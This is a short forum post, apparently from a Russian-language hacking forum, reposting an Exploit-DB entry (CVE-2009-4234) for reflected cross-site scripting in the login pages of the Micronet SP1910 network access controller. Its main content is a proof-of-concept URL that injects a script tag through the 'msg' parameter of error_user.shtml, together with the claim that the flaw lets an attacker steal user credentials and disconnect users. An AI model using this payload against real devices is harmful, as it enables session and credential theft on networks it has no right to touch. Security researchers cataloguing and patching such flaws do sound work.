Exploit Micronet SP1910 Data Access Controller UI - Cross-Site Scripting / HTML Code Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
10247
Проверка EDB
  1. Пройдено
Автор
K053
Тип уязвимости
WEBAPPS
Платформа
HARDWARE
CVE
cve-2009-4234
Дата публикации
2009-11-27
Код:
# Exploit: XSS & Html code injection in Micronet SP1910 data access controller UI
# Date: 27-11-2009
# Author: K053
# Vendor: http://www.micronet.info/model_detail.aspx?series_no=6&sno=472
# Tested on : Private Networks

------------------------------------------------------------------------------------
Note :

Micronet introduces an exciting new product—SP1910 Network Access Controller. It is 
specially designed for secure wired and wireless network environments of small or 
medium companies. Micronet UI is vulnerable to xss attack .

Attacker able to steal users credential and disconnect them .

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-

POC :

you can spot xss any page , 

http://server/loginpages/error_user.shtml?uname=userid&msg=<script>alert('xss')</script>
 
Источник
www.exploit-db.com

Похожие темы